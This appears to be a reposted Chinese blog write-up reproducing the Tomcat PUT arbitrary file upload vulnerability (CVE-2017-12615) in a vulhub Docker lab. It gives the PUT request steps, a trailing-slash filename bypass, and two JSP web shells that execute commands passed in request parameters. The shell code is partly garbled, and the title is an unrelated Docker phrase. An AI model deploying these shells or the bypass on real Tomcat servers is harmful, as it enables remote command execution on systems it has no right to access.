dockers log查询dockers的文件_Tomcat PUT方法任意文件上传
生活随笔
收集整理的這篇文章主要介紹了
dockers log查询dockers的文件_Tomcat PUT方法任意文件上传
小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.
漏洞背景:
????tomcat(7.0.0-7.8.1)服務(wù)器,開啟了HTTP PUT請(qǐng)求方法,web.xml文件中的readonly值設(shè)置未false
漏洞環(huán)境:
使用vulhub環(huán)境,直接dockers安裝
安裝成功:
安裝vulhub詳見:
????https://vulhub.org/#/index/
漏洞利用:
直接抓包進(jìn)行修改
????1、修改為put方法
????2、寫入shell
測試是否開啟PUT方法
寫入shell(注意需要在文件名后面加上一個(gè)/進(jìn)行過濾繞過,未加/會(huì)報(bào)錯(cuò),如果寫入一個(gè)txt文件則不用加/且不會(huì)報(bào)錯(cuò))
測試結(jié)果
shell(linux下使用,我之前用了一個(gè)Windows的,執(zhí)行報(bào)錯(cuò))
"java" import=public static String excuteCmd(String c) { StringBuilder line = new StringBuilder(); try { Process pro = Runtime.getRuntime().exec(c); BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); String temp = null; while ((temp = buf.readLine()) != null) { line.append(temp + "\\n"); } buf.close(); } catch (Exception e) { line.append(e.getMessage()); } return line.toString();} %> if(else{out.println(":-)");}%>shell(windows,未使用過,一個(gè)大佬的復(fù)現(xiàn)使用的)
if("123".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[1024]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(" } %>后續(xù)再試著使用其它的shell及工具(CVE-2017-12615漏洞利用工具)進(jìn)行測試,提高效率
總結(jié)
以上是生活随笔為你收集整理的dockers log查询dockers的文件_Tomcat PUT方法任意文件上传的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: linux find 拷贝,通过find
- 下一篇: 用户输入一个字符串,将下标为偶数的字符提